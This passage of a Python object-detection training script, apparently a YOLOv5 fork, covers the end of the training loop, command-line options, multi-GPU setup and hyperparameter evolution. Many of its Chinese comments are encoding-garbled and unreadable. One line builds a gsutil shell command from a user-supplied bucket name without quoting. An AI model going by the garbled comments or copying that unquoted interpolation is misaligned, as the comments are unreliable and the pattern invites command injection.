[stop if RANK == 0 else None] dist.broadcast_object_list(broadcast_list, 0) # broadcast 'stop' to all ranks if RANK != 0: stop = broadcast_list[0] if stop: break # must break all DDP ranks # end epoch ---------------------------------------------------------------------------------------------------- # end training ----------------------------------------------------------------------------------------------------- if RANK in {-1, 0}: LOGGER.info(f'\n{epoch - start_epoch + 1} epochs completed in {(time.time() - t0) / 3600:.3f} hours.') for f in last, best: if f.exists(): strip_optimizer(f) # strip optimizers if f is best: LOGGER.info(f'\nValidating {f}...') results, _, _ = val.run( data_dict, batch_size=batch_size // WORLD_SIZE * 2, imgsz=imgsz, model=attempt_load(f, device).half(), iou_thres=0.65 if is_coco else 0.60, # best pycocotools results at 0.65 single_cls=single_cls, dataloader=val_loader, save_dir=save_dir, save_json=is_coco, verbose=True, plots=plots, callbacks=callbacks, compute_loss=compute_loss) # val best model with plots if is_coco: callbacks.run('on_fit_epoch_end', list(mloss) + list(results) + lr, epoch, best_fitness, fi) callbacks.run('on_train_end', last, best, plots, epoch, results) torch.cuda.empty_cache() return results def parse_opt(known=False): parser = argparse.ArgumentParser() # `--weights` (â­�)指定模å�‹æ�ƒé‡�,如æ�œä¸�加此å�‚数会默认使用COCO预训的`yolov5s.pt`作为åˆ�始化æ�ƒé‡�,`--weights ''`则会éš�机åˆ�始化æ�ƒé‡� parser.add_argument('--weights', type=str, default=ROOT / 'yolov5s.pt', help='initial weights path') # `--cfg` 指定模å�‹æ–‡ä»¶ï¼Œå½“使用`--weights ''`时,需用此命令指定模å�‹æ–‡ä»¶ã€‚ parser.add_argument('--cfg', type=str, default=ROOT / 'yolov5s-demo.yaml', help='model.yaml path') # parser.add_argument('--cfg', type=str, default='', help='model.yaml path') # `--data` (â­�)指定数æ�®æ–‡ä»¶ parser.add_argument('--data', type=str, default=ROOT / 'data/demo.yaml', help='dataset.yaml path') # `--hyp`指定超å�‚数文件 parser.add_argument('--hyp', type=str, default=ROOT / 'data/hyps/hyp.scratch-low.yaml', help='hyperparameters path') # `--epochs` (â­�)指定epoch数,默认300 parser.add_argument('--epochs', type=int, default=300) # `--batch-size` `--batch` (â­�)指定batch大å°�,默认`16`,传`-1`çš„è¯�就是autobatch parser.add_argument('--batch-size', type=int, default=16, help='total batch size for all GPUs, -1 for autobatch') # `--img-size` `--img` `--imgsz`(â­�)指定训练图片大å°�,默认`640` # YOLOv5-P5 models: yolov5n, yolov5s, yolov5m, yolov5l, yolov5x 设置640 # YOLOv5-P6 models: yolov5n6, yolov5s6, yolov5m6, yolov5l6, yolov5x6 设置640/1280 parser.add_argument('--imgsz', '--img', '--img-size', type=int, default=640, help='train, val image size (pixels)') parser.add_argument('--rect', action='store_true', help='rectangular training') parser.add_argument('--resume', nargs='?', const=True, default=False, help='resume most recent training') parser.add_argument('--nosave', action='store_true', help='only save final checkpoint') parser.add_argument('--noval', action='store_true', help='only validate final epoch') parser.add_argument('--noautoanchor', action='store_true', help='disable AutoAnchor') parser.add_argument('--noplots', action='store_true', help='save no plot files') parser.add_argument('--evolve', type=int, nargs='?', const=300, help='evolve hyperparameters for x generations') parser.add_argument('--bucket', type=str, default='', help='gsutil bucket') # `--cache` 缓存到`ram`或者`disk`以加速训练 parser.add_argument('--cache', type=str, nargs='?', const='ram', help='--cache images in "ram" (default) or "disk"') parser.add_argument('--image-weights', action='store_true', help='use weighted image selection for training') # `--device` (â­�)指定训练设备,如`--device 0,1,2,3` # v6.2 已支æŒ�Apple Silicon MPS support for Apple M1/M2 devices with --device mps # https://github.com/pytorch/pytorch/issues/77764 parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu') parser.add_argument('--multi-scale', action='store_true', help='vary img-size +/- 50%%') parser.add_argument('--single-cls', action='store_true', help='train multi-class data as single-class') parser.add_argument('--optimizer', type=str, choices=['SGD', 'Adam', 'AdamW'], default='SGD', help='optimizer') parser.add_argument('--sync-bn', action='store_true', help='use SyncBatchNorm, only available in DDP mode') # `--workers` 指定dataloaderçš„workersæ•°é‡�,默认`8` parser.add_argument('--workers', type=int, default=8, help='max dataloader workers (per RANK in DDP mode)') # `--project` 训练结æ�œå­˜æ”¾ç›®å½•,默认./runs/train/ parser.add_argument('--project', default=ROOT / 'runs/train', help='save to project/name') # `--name` 训练结æ�œå­˜æ”¾å��,默认exp parser.add_argument('--name', default='exp', help='save to project/name') parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment') parser.add_argument('--quad', action='store_true', help='quad dataloader') parser.add_argument('--cos-lr', action='store_true', help='cosine LR scheduler') # `--label-smoothing` 标签平滑处ç�†ï¼Œé»˜è®¤`0.0` parser.add_argument('--label-smoothing', type=float, default=0.0, help='Label smoothing epsilon') # `--patience` 多少个epoch没有æ��å�‡å°±ç»ˆæ­¢è®­ç»ƒï¼Œé»˜è®¤100 parser.add_argument('--patience', type=int, default=100, help='EarlyStopping patience (epochs without improvement)') # `--freeze` 冻结模å�‹å±‚数,默认0ä¸�冻结,冻结主干网就传10,冻结所有就传24 parser.add_argument('--freeze', nargs='+', type=int, default=[0], help='Freeze layers: backbone=10, first3=0 1 2') # `--save_period` 设置多少个epochä¿�存一次模å�‹ parser.add_argument('--save-period', type=int, default=-1, help='Save checkpoint every x epochs (disabled if < 1)') parser.add_argument('--seed', type=int, default=0, help='Global training seed') # `--local_rank` 分布å¼�训练å�‚数,ä¸�è¦�自己修改ï¼� parser.add_argument('--local_rank', type=int, default=-1, help='Automatic DDP Multi-GPU argument, do not modify') # Weights & Biases arguments parser.add_argument('--entity', default=None, help='W&B: Entity') parser.add_argument('--upload_dataset', nargs='?', const=True, default=False, help='W&B: Upload data, "val" option') # `--bbox_interval` 设置W&B的标签图片显示间隔(?) parser.add_argument('--bbox_interval', type=int, default=-1, help='W&B: Set bounding-box image logging interval') # `--artifact_alias` W&B用哪个版本的数æ�®é›† parser.add_argument('--artifact_alias', type=str, default='latest', help='W&B: Version of dataset artifact to use') return parser.parse_known_args()[0] if known else parser.parse_args() # æ— å�‚指令 # `--rect`矩形训练 # `--resume` 继续训练,默认ä»�最å��一次训练继续 # `--nosave` 训练中途ä¸�存储模å�‹ï¼Œå�ªå­˜æœ€å��一个checkpoint # `--noval` 训练中途ä¸�在验è¯�集上测试,训练完毕å†�测试 # `--noautoanchor` 关闭自动锚点检测 # `--evolve` è¶…å�‚æ•°æ¼”å�˜ # `--bucket`使用谷歌gsutil bucket # `--image-weights` 训练中对图片加æ�ƒé‡� # `--multi-scale` 训练图片大å°�+/-50%å�˜æ�¢ # `--single-cls` å�•类训练 # `--adam` 使用torch.optim.Adam()优化器 # `--sync-bn` 使用SyncBatchNorm,å�ªåœ¨åˆ†å¸ƒå¼�训练å�¯ç”¨ # `--entity` W&Bçš„å�‚数,ä¸�懂 # `--exist-ok` 如训练结æ�œå­˜æ”¾è·¯å¾„é‡�å��,ä¸�覆盖已存在的文件夹 # `--quad` 使用四å�ˆä¸€dataloader,详è§�å�Ÿä½œè€…[说æ˜�](https://github.com/ultralytics/yolov5/issues/1898) # `--linear-lr` 线性学习ç�‡ # `--upload_dataset` 上传数æ�®é›†è‡³W&B def main(opt, callbacks=Callbacks()): # Checks if RANK in {-1, 0}: print_args(vars(opt)) check_git_status() check_requirements() # Resume if opt.resume and not (check_wandb_resume(opt) or opt.evolve): # resume from specified or most recent last.pt last = Path(check_file(opt.resume) if isinstance(opt.resume, str) else get_latest_run()) opt_yaml = last.parent.parent / 'opt.yaml' # train options yaml opt_data = opt.data # original dataset if opt_yaml.is_file(): with open(opt_yaml, errors='ignore') as f: d = yaml.safe_load(f) else: d = torch.load(last, map_location='cpu')['opt'] opt = argparse.Namespace(**d) # replace opt.cfg, opt.weights, opt.resume = '', str(last), True # reinstate if is_url(opt_data): opt.data = check_file(opt_data) # avoid HUB resume auth timeout else: opt.data, opt.cfg, opt.hyp, opt.weights, opt.project = \ check_file(opt.data), check_yaml(opt.cfg), check_yaml(opt.hyp), str(opt.weights), str(opt.project) # checks assert len(opt.cfg) or len(opt.weights), 'either --cfg or --weights must be specified' if opt.evolve: if opt.project == str(ROOT / 'runs/train'): # if default project name, rename to runs/evolve opt.project = str(ROOT / 'runs/evolve') opt.exist_ok, opt.resume = opt.resume, False # pass resume to exist_ok and disable resume if opt.name == 'cfg': opt.name = Path(opt.cfg).stem # use model.yaml as name opt.save_dir = str(increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok)) # DDP mode device = select_device(opt.device, batch_size=opt.batch_size) if LOCAL_RANK != -1: msg = 'is not compatible with YOLOv5 Multi-GPU DDP training' assert not opt.image_weights, f'--image-weights {msg}' assert not opt.evolve, f'--evolve {msg}' assert opt.batch_size != -1, f'AutoBatch with --batch-size -1 {msg}, please pass a valid --batch-size' assert opt.batch_size % WORLD_SIZE == 0, f'--batch-size {opt.batch_size} must be multiple of WORLD_SIZE' assert torch.cuda.device_count() > LOCAL_RANK, 'insufficient CUDA devices for DDP command' torch.cuda.set_device(LOCAL_RANK) device = torch.device('cuda', LOCAL_RANK) dist.init_process_group(backend="nccl" if dist.is_nccl_available() else "gloo") # Train if not opt.evolve: train(opt.hyp, opt, device, callbacks) # Evolve hyperparameters (optional) else: # Hyperparameter evolution metadata (mutation scale 0-1, lower_limit, upper_limit) meta = { 'lr0': (1, 1e-5, 1e-1), # initial learning rate (SGD=1E-2, Adam=1E-3) 'lrf': (1, 0.01, 1.0), # final OneCycleLR learning rate (lr0 * lrf) 'momentum': (0.3, 0.6, 0.98), # SGD momentum/Adam beta1 'weight_decay': (1, 0.0, 0.001), # optimizer weight decay 'warmup_epochs': (1, 0.0, 5.0), # warmup epochs (fractions ok) 'warmup_momentum': (1, 0.0, 0.95), # warmup initial momentum 'warmup_bias_lr': (1, 0.0, 0.2), # warmup initial bias lr 'box': (1, 0.02, 0.2), # box loss gain 'cls': (1, 0.2, 4.0), # cls loss gain 'cls_pw': (1, 0.5, 2.0), # cls BCELoss positive_weight 'obj': (1, 0.2, 4.0), # obj loss gain (scale with pixels) 'obj_pw': (1, 0.5, 2.0), # obj BCELoss positive_weight 'iou_t': (0, 0.1, 0.7), # IoU training threshold 'anchor_t': (1, 2.0, 8.0), # anchor-multiple threshold 'anchors': (2, 2.0, 10.0), # anchors per output grid (0 to ignore) 'fl_gamma': (0, 0.0, 2.0), # focal loss gamma (efficientDet default gamma=1.5) 'hsv_h': (1, 0.0, 0.1), # image HSV-Hue augmentation (fraction) 'hsv_s': (1, 0.0, 0.9), # image HSV-Saturation augmentation (fraction) 'hsv_v': (1, 0.0, 0.9), # image HSV-Value augmentation (fraction) 'degrees': (1, 0.0, 45.0), # image rotation (+/- deg) 'translate': (1, 0.0, 0.9), # image translation (+/- fraction) 'scale': (1, 0.0, 0.9), # image scale (+/- gain) 'shear': (1, 0.0, 10.0), # image shear (+/- deg) 'perspective': (0, 0.0, 0.001), # image perspective (+/- fraction), range 0-0.001 'flipud': (1, 0.0, 1.0), # image flip up-down (probability) 'fliplr': (0, 0.0, 1.0), # image flip left-right (probability) 'mosaic': (1, 0.0, 1.0), # image mixup (probability) 'mixup': (1, 0.0, 1.0), # image mixup (probability) 'copy_paste': (1, 0.0, 1.0)} # segment copy-paste (probability) with open(opt.hyp, errors='ignore') as f: hyp = yaml.safe_load(f) # load hyps dict if 'anchors' not in hyp: # anchors commented in hyp.yaml hyp['anchors'] = 3 if opt.noautoanchor: del hyp['anchors'], meta['anchors'] opt.noval, opt.nosave, save_dir = True, True, Path(opt.save_dir) # only val/save final epoch # ei = [isinstance(x, (int, float)) for x in hyp.values()] # evolvable indices evolve_yaml, evolve_csv = save_dir / 'hyp_evolve.yaml', save_dir / 'evolve.csv' if opt.bucket: os.system(f'gsutil cp gs://{opt.bucket}/evolve.csv {evolve_csv}') # download evolve.csv if exists for _ in range(opt.evolve): # generations to evolve if evolve_csv.exists(): # if evolve.csv exists: select best hyps and mutate # Select parent(s) parent = 'single' # parent selection method: 'single' or 'weighted' x = np.loadtxt(evolve_csv, ndmin=2, delimiter=',', skiprows=1) n = min(5, len(x)) # number of previous results to consider x = x[np.argsort(-fitness(x))][:n] # top n mutations w = fitness(x) - fitness(x).min() + 1E-6 # weights (sum > 0) if parent == 'single' or len(x) == 1: # x = x[random.randint(0, n - 1)] # random selection x = x[random.choices(range(n), weights=w)[0]] # weighted selection elif parent == 'weighted': x = (x * w.reshape(n, 1)).sum(0) / w.sum() # weighted combination # Mutate mp, s = 0.8, 0.2 # mutation probability, sigma npr = np.random npr.seed(int(time.time())) g = np.array([meta[k][0] for k in hyp.keys()]) # gains 0-1 ng = len(meta) v = np.ones(ng) while all(v == 1): # mutate until a change occurs (prevent duplicates) v = (g * (npr.random(ng) < mp) * npr.randn(ng) * npr.random() * s + 1).clip(0.3, 3.0) for i, k in enumerate(hyp.keys()): # plt.hist(v.ravel(), 300) hyp[k] = float(x[i + 7] * v[i]) # mutate # Constrain to limits for k, v in meta.items(): hyp[k] = max(hyp[k], v[1]) # lower limit hyp[k] = min(hyp[k], v[2]) # upper limit hyp[k] = round(hyp[k], 5) # significant digits # Train mutation results = train(hyp.copy(), opt, device, callbacks) callbacks = Callbacks() # Write mutation results print_mutation(results, hyp.copy(), save_dir, opt.bucket) # Plot results plot_evolve(evolve_csv) LOGGER.info(f'Hyperparameter evolution finished {opt.evolve} generations\n' f"Results saved to {colorstr('bold', save_dir)}\n" f'Usage example: $ python train.py --hyp {evolve_yaml}') def run(**kwargs): # Usage: import train; train.run(data='coco128.yaml', imgsz=320, weights='yolov5m.pt') opt = parse_opt(True) for k, v in kwargs.items(): setattr(opt, k, v) main(opt) return opt if __name__ == "__main__": opt = parse_opt() main(opt)
36,030
Python
.py
603
47.907131
170
0.565549
FlatWhite233/yolov5_garbage_detect
8
1
0
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)